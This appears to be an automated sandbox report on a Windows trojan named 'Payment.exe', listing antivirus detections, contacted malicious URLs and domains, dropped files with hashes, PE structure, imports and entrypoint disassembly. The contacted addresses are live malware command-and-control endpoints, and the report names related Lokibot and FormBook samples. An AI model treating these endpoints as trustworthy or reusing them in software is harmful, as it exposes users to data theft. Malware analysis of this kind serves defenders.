Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment.exe	56%	Virustotal		Browse
Payment.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sccc/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.64.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sccc/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1626083
Start date and time:	2025-02-27 23:40:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 53 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:41:21	API Interceptor	61x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	7RryusxiMtHBz80.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	laser.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	UPDATED SOA.pdf.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/t3l4/
	QUOTE OF DRY DOCK REPAIR.exe	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/ljgq/
	QUOTATION NO REQ-19-000640.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/2875/
	Revised Order Confirmation.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/hbfq/
	UPIlkrNpsh.exe	Get hash	malicious	Unknown	Browse	xerecao.cc/
	engine.ps1	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/b8fe/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	104.21.16.1
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	7RryusxiMtHBz80.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	PO.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Phish!MSR' in file 'US_DOA_Tender_2023.pdf'	Get hash	malicious	Unknown	Browse	162.159.61.3
	DocKing.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	call_playback_Senecacollege.html	Get hash	malicious	HTMLPhisher	Browse	104.21.96.1
	rDOC-202501.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	rDOC-202502.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	DocKing.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://mr.bbldrizzy.top/	Get hash	malicious	Unknown	Browse	104.18.95.41
	0rDtDZ6Foa.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.185.238
	UVFpX7iieV.exe	Get hash	malicious	RedLine	Browse	104.26.12.31
	https://gq.elindactori.ru/MSg1w31/	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.21.2.8

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	data
Category:	dropped
Size (bytes):	82764
Entropy (8bit):	7.965175508239638
Encrypted:	false
SSDEEP:	1536:48g29rY9H6jfT6dkbncwrz1WsEPC4ukGG7yXzUrDo+Zowp+gxbz:+2BjT6ODz1urJ7yDUrDo+Gwsgxn
MD5:	811074F3A281C2D0412065B23BF7C652
SHA1:	2F768CE74FEAB8A1C99D4C7644AB16626D951689
SHA-256:	E7AF803C8AF129B442C9AB1AAEA60F12E22A95F696D4D2E47268D41ECF78F23B
SHA-512:	48832098DCF07034BA7F433DBA294643CD46F31E3ED4C44FEC743D6FBD3B8DD51DD1B88DBEE471A126975B119EEBB3FA040AA4225D8A558DAC5796970496D637
Malicious:	false
Reputation:	low
Preview:	EA06.....X.5Z.NgF..j.m...A.Pk4y.F.A....0.2.4..f..y....zP.2.,...Y.....EqQ.,.Q ..5...AY.......q...t..v+=.Xn...ZY6..o..ef.....2..........g....WC..f..Hfn5.....V...f+>.].U...h~..~....$..o...}j9^....z........{d..%....&.......Q:..c..Q.....i.....G..g1`..u).)..K.Tm.....;...7....W.."5 .b.T.T@=...B.T.B.......N.8....oT.pf....I.0j59.X.....>.J.H.[.........t...N........&1..M).P.o.-A.K..I,.gY..d @-.....&....g.t..n...0.."...,..P......c...9.M..O1P.6..`.9.................Tv.<.khr.....&`....:.$..`...3.k'........=m...N....O......gS.Mt.0.M.~t..G......V.\|./...:...}(.......O@..\|.P.4z-g..<Q.3....0..it..T.`...w....6.r..X.Phs:5:{..U.9...G.Tj......\|}(.K...A..B...\Z@.Y...E..2.Z......&...K....+;<....... .......k.y.c.Y....?.VUE.S. .G;sA..j{..^cT..%....kR..jy].OwG..<...w.E..*:..;q..&...\.t..74...v..wv....{....[.@....s.`...kM..0=.7......(...`.A.<..........'.u.......y7.}v....L.6n.&....B....E...\|.....Fq...-f.......w..@.R.u..+W......-.o..r.J.0...q.!X...]..Ll.N..)..F......]..h..

C:\Users\user\AppData\Local\Temp\springmaker

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.41038002678271
Encrypted:	false
SSDEEP:	1536:DRUadOOzLTE5YB9bczRU3tUEk5r55Nrlcj5+GFPhd6Iv6IDxqUnigZA:dUwHLTELzFTrHPcjThdTiIwgZA
MD5:	9E31990D7F9AB368638B72ED44CEA24D
SHA1:	7BD2F418F3277D2C94AAE56955AF145BA5D870F3
SHA-256:	F0AD19A6C40B07ED35179B0921938B42E32575150734C5477CDFE80D7115410C
SHA-512:	5C1586631D476741F710B1B9D4FFBE67B90A99CDFD84F4C7A8832A71F3AA67DFF7131C948691AF06E46756BD86AECBEC0E13A9C42C7D1106090B2DF6FEBF29F3
Malicious:	false
Reputation:	low
Preview:	.b.UBS3F75T6..OA.AYG8QUA.3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8Q.AS3H,.Z6.=.`.@....=( .6AZ3D Yo"W/7(Lq7$sA3].=Xap...,6#].XLY.F35T6A4..N.......E..#......W.......%.M..Y..s...C..P... ....Q...V...%...... .du....E.{.....".._"1.G.AS3F35T6.qOAz@]G.Y9.S3F35T6A.OB7JXK8Qm@S3.;5T6A4.x7AYW8QU.R3F3uT6Q4OA4AYB8PUAS3F65U6A4OA6aSG8UUAS3F37T6.4OQ6AIG8QUQS3V35T6A4_A6AYG8QUAS3..4TRA4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYGhPU.S3F35T6A4OA6AYG8QUAS3F35T6A.;$N5YG8.c@S3V35T.@4OE6AYG8QUAS3F35T.A4/oD%83YQU!.3F3eU6AvOA6}XG8QUAS3F35T6AtOAvo=&L0UAS..;5T.@4OC6AY99QUAS3F35T6A4O.6A.i@QUAS3F3.T6A4EA6aYG8.TAS3F35T6A4OA6AYG.QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6A4OA6AYG8QUAS3F35T6

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.882077875113399
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment.exe
File size:	984'576 bytes
MD5:	f79e4de7214575cd58e80093282f0fbb
SHA1:	b1d29aae58c587dc17befc8fd02645b701331963
SHA256:	4a1337ce1b0e4eddd00b04b4559d8fc6b9bb30514a7e2ced19ac5691a6d93144
SHA512:	0b843dbb03c0cba7927ae24e9fc5062a5f15acf4a357b3402357c2d73f6f3cef66bb78b36f29f2944d38dffeded92ec77ebb500b9fe4c6e66693f96b8d1f8cd7
SSDEEP:	24576:lu6J33O0c+JY5UZ+XC0kGso6FaFpsHvogtyWY:nu0c++OCvkGs9FaF2HvtY
TLSH:	1125AD2273DDC360CB669173BF6AB7016EBF7C614630B85B2F980D7DA950162162C7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67BFBFB0 [Thu Feb 27 01:28:16 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F1F4CF5A35Ah
jmp 00007F1F4CF4D124h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1F4CF4D2AAh
cmp edi, eax
jc 00007F1F4CF4D60Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F1F4CF4D2A9h
rep movsb
jmp 00007F1F4CF4D5BCh
cmp ecx, 00000080h
jc 00007F1F4CF4D474h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1F4CF4D2B0h
bt dword ptr [004BE324h], 01h
jc 00007F1F4CF4D780h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1F4CF4D44Dh
test edi, 00000003h
jne 00007F1F4CF4D45Eh
test esi, 00000003h
jne 00007F1F4CF4D43Dh
bt edi, 02h
jnc 00007F1F4CF4D2AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1F4CF4D2B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1F4CF4D305h
bt esi, 03h
jnc 00007F1F4CF4D358h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x27d28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xef000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x27d28	0x27e00	863adf0022447378b66ac54052e53258	False	0.8345843945924765	data	7.643947705514004	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xef000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1efef	data			1.0003623216944053
RT_GROUP_ICON	0xee7a8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xee820	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xee834	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xee848	0x14	data	English	Great Britain	1.25
RT_VERSION	0xee85c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xee938	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
